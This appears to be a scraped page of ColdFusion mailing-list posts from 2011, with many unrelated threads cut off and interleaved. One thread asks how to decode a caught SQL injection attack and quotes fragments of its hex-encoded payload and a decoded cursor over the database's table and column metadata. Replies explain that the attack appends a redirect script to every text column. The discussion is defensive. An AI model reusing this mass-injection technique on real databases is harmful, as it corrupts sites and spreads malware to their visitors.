you just go into the handler mappings at root or site level and add the
handler yourself rather than let the web config tool do it.
the advantage is that you canuse the same connector for all site, whereas
the config tool creates a new connector for each site, which is pointless on
a standard
I am posting this again, the last time the formatting got kinda munged:
I am trying to set up an inventory/ticket purchasing system. I have a table
that stores the available quantity, and I have a form where users can
purchase tickets. The form shows the current number of available tickets.
I have an application.cfc in my root folder that defines my app. I also have
a subfolder that has it's own app.cfc which
extends the original app through the ApplicationProxy.cfc method. Basically
this is being done to have a different
OnRequestStart method.
The way I thought I
Can anyone decode this? This was a URL attack that was caught by some custom
code. I tried decoding the string at
http://meyerweb.com/eric/tools/dencoder/ but had no luck.
113|736;DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
Patial:
DECLARE @T varchar(255),@C varcha??C?DT4??$R?F??U?7W'6??5U%4??d?R
select a.name,b.name from
sysobjects7?66??V??2??v?WRC???B???B???xtype='u' and (b.xtype=99
or b.xtype=3?R?G??S?#3??G??S??crT??Table_Cursor FETCH NEXT
FROM
John, what did you do to decode this? Thanks, Che
-Original Message-
From: John M Bliss [mailto:bliss.j...@gmail.com]
Sent: Friday, May 13, 2011 10:34 AM
To: cf-talk
Subject: Re: Can anyone decode this?
Patial:
DECLARE @T varchar(255),@C varcha??C?DT4??$R?F??U?7W'6??5U%4??d?R
My guess is based on the partial decoding it has to do with this:
http://www.broadbandreports.com/forum/r21043551-sdo1000mgcncsrsswjs-what-is-it
From: John M Bliss bliss.j...@gmail.com
To: cf-talk cf-talk@houseoffusion.com
Sent: Fri, May 13, 2011 8:34:09 AM
http://www.dolcevie.com/js/converter.html
On Fri, May 13, 2011 at 9:36 AM, Che Vilnonis ch...@asitv.com wrote:
John, what did you do to decode this? Thanks, Che
-Original Message-
From: John M Bliss [mailto:bliss.j...@gmail.com]
Sent: Friday, May 13, 2011 10:34 AM
To: cf-talk
Put this in your SQL Query analyzer tool and change the EXEC at the end to
PRINT. It should print out the SQL Statement for you to see what they were
trying to do.
Cheers,
Jeff
-Original Message-
From: Che Vilnonis [mailto:ch...@asitv.com]
Sent: Friday, May 13, 2011 7:31 AM
To:
This tries to append a malicious script to all the character columns in your
DB in the hopes that you will select them and output them to a page (thus
propogating the link).
The script is a script block that redirects to a malicious site. Here's
the basic out line with the script removed.
it is some very clever SQL though
On Fri, May 13, 2011 at 3:57 PM, Mark A. Kruger mkru...@cfwebtools.comwrote:
This tries to append a malicious script to all the character columns in
your
DB in the hopes that you will select them and output them to a page (thus
propogating the link).
Yep a bit cleaner than the last attack like this I saw.
-Original Message-
From: Russ Michaels [mailto:r...@michaels.me.uk]
Sent: Friday, May 13, 2011 10:31 AM
To: cf-talk
Subject: Re: Can anyone decode this?
it is some very clever SQL though
On Fri, May 13, 2011 at 3:57 PM, Mark
Here is what I am running into. I have a web form that takes in the info I
need. I process the form on the next page and it creates an XML document
that I need (which is being created successfully). I need to display
something back to the end user telling them it's been created. After my
Greetings and Salutations My Fellow Programmers!
I have recently discovered a security flaw that I have reported to the Adobe
team regarding the use of the variable cgi.host_name.
As you know, the cgi.host_name is typically the hostname of the server or
the websites domain name. I've
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and
a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
can you post the code here
http://pastebin.com/
http://pastebin.com/
On Fri, May 13, 2011 at 5:43 PM, Ken Hammond khamm...@saleminc.com wrote:
Here is what I am running into. I have a web form that takes in the info I
need. I process the form on the next page and it creates an XML
Here is what I am running into. I have a web form that takes in the info I
need. I process the form on the next page and it creates an XML document
that I need (which is being created successfully). I need to display
something back to the end user telling them it's been created. After my
I have recently discovered a security flaw that I have reported to the Adobe
team regarding the use of the variable cgi.host_name.
As you know, the cgi.host_name is typically the hostname of the server or
the websites domain name. I've discovered an exploit that allows a user to
basically
my guess is that you have answered your question by saying that you could use a
cflocation tag.
Alternatively, if you trust your xml scrip to always create the xml document
without errors, you may use a prompt to display your activity status just
before
you use the xml script.
Best
Dave pretty much summed it up. Anybody who knows what a HOSTS file is,
knows how to mask the server_name. :)
Jason Durham
On Fri, May 13, 2011 at 2:28 PM, Dave Watts dwa...@figleaf.com wrote:
I have recently discovered a security flaw that I have reported to the
Adobe
team regarding
Just checking in Mary. Were you able to get past this? Have you
considering contacting Adobe for official support?
No, we had to drop the use of Solr at this time,
Just FYI, I did submit a bug report on this, if anyone wants to comment or vote
on it.
Hey...
I am trying to get a CF8 app working on CF9, and it was all seamless until I
ran into CFCACHE.
I'm having problems getting CFCACHE to save anything to disk. I understand the
default behavior is now in-memory caching, but for now I'm just trying to get
this thing to work as it did in
22 matches
Mail list logo
